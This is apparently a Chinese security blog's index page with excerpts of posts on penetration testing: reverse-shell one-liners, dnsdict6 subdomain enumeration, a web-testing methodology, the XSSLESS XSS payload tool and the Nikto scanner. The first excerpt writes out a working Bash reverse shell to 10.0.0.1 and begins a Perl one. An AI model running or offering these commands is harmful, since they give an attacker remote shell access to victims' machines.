摘要：Bash [不通用，跟linux发行版本有关，在ubuntu上测试成功]bash -i >& /dev/tcp/10.0.0.1/8080 0>&1Perlperl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,g... 阅读全文

该文被密码保护。

摘要：基本用法就是： dnsdict6 -d46 -t 10 baidu.com 阅读全文

摘要：1,分析目标网站内容及功能(1) 首先确定网站采用何种语言编写.或者是否有混用的情况.此处可以通过查看网站源文件,观察网站链接,捕获提交请求等方式获取.(2) 爬行网站目录,使用工具对网站目录进行爬行,可以辅助上一步让结果更加精准.将爬行结果存档,如果可以,此处应分析出网站是否使用通用程序,如果是,记录下来.进行下一步.(3) 根据上一步的爬行结果,对网站根目录或者关键目录进行暴力目录探测,如果网站为通用程序,判读是否有过二次开发,如非通用程序,在探测到的目录中寻找关键目录及文件.此步骤详细测试方法:1.输入并访问一些不可能存在的文件或目录名,再输入并访问一些通过目录爬行已知存在的目录及文件名 阅读全文

摘要：XSSLESS 一个用Python编写的自动化XSS 负载(payload)攻击器 用法： 特点： 下载： 下载最新版本的 XSSLESS 运行该脚本(Python软件的运行详见我的那篇windows运行sqlmap的文章，大同小异！传送门在此) 演示： 这是一个 XSS负载输出(未压缩)是通过XS 阅读全文

摘要：1. Nikto 下载 以下是引用片段： 这是一个开源的Web 服务器扫描程序，它可以对Web 服务器的多种项目(包括3500个潜在的危险 文件/CGI，以及超过900 个服务器版本，还有250 多个服务器上的版本特定问题)进行全面的测 试。其扫描项目和插件经常更新并且可以自动更新(如果需要的话)。 阅读全文